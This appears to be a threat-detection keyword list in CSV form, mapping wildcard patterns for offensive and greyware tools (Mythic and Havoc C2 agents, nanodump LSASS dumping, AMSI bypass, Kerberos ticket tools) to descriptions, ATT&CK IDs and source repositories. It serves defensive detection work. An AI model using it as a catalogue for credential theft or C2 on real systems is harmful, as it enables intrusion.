T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_payloadtype*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_payloadtype_container*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_rest.Payload*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_service.py*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_translator_containter*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*MythicAgents/Apollo*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*MythicAgents/Athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*MythicAgents/merlin*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*MythicAgents/tetanus*,offensive_tool_keyword,tetanus,Mythic C2 agent targeting Linux and Windows hosts written in Rust,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://github.com/MythicAgents/tetanus,1,1,N/A,N/A,3,229,33,2023-05-14T21:34:20Z,2022-03-07T20:35:33Z -*mythic-cli *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic-cli*athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*MythicClient.cs*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*mythic-docker*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*MzHmO/DebugAmsi*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*MzHmO/Privileger*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z 
-*MzHmO/TGSThief*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z
-*n00py/LAPSDumper*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,1,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z
-*n00py/Slackor*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z
-*n0de.exe*elevationstation*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*n1k7l4i/goMatrixC2*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z
-*n1k7l4i/goZulipC2*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z
-*n1nj4sec*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/n1nj4sec,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*nabbmpekekjknlbkgpodfndbodhijjem*,greyware_tool_keyword,Earth VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nac_bypass*,offensive_tool_keyword,nac_bypass,nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters,T1550.002 - T1078 - T1133 - T1040 - T1550,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Defense Evasion,https://github.com/scipag/nac_bypass,1,1,N/A,N/A,3,229,62,2023-08-02T09:09:19Z,2019-01-03T06:55:00Z -*nagios-root-privesc.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*--name chisel -p *,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*name=*Domain Admins*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. 
or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*named_pipes.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NamedPipeImpersonation.cs*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*NamedPipeImpersonation.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - 
T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*NamedPipeServer.ps1*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*namespace CredPhisher*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*namespace RedPersist.Persist*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*namespace WheresMyImplant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*namfblliamklmeodpcelkokjbffgmeoo*,greyware_tool_keyword,Daily VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*namp *--script *,offensive_tool_keyword,nmap,Nmap (Network Mapper) is a free 
and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Network Exploitation tools,https://nmap.org/book/nse-usage.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nanodump *,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump -*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*nanodump.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.git*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.x64.exe*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*nanodump_pipe*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*nanodump_ppl.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*nanodump_ppl_dump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS 
dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_dump.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_dump.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_medic*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_medic.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_medic.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*nanodump_ssp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*nanodump_ssp.x64.dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp_embedded.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*NanoDumpChoose*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*nanodump-pipes*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*NanoDumpWriteDump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanorobeus*_cs.x64.*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus*_cs.x86.*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus*dump*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus.cna*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*nanorobeus.x64*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus.x64.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*nanorobeus.x86*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus_brc4*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus64*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus86*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus-main*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorubeus.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Narasimha1997/fake-sms*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,1,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*NativeEasyHook32.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*NativeEasyHook64.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that 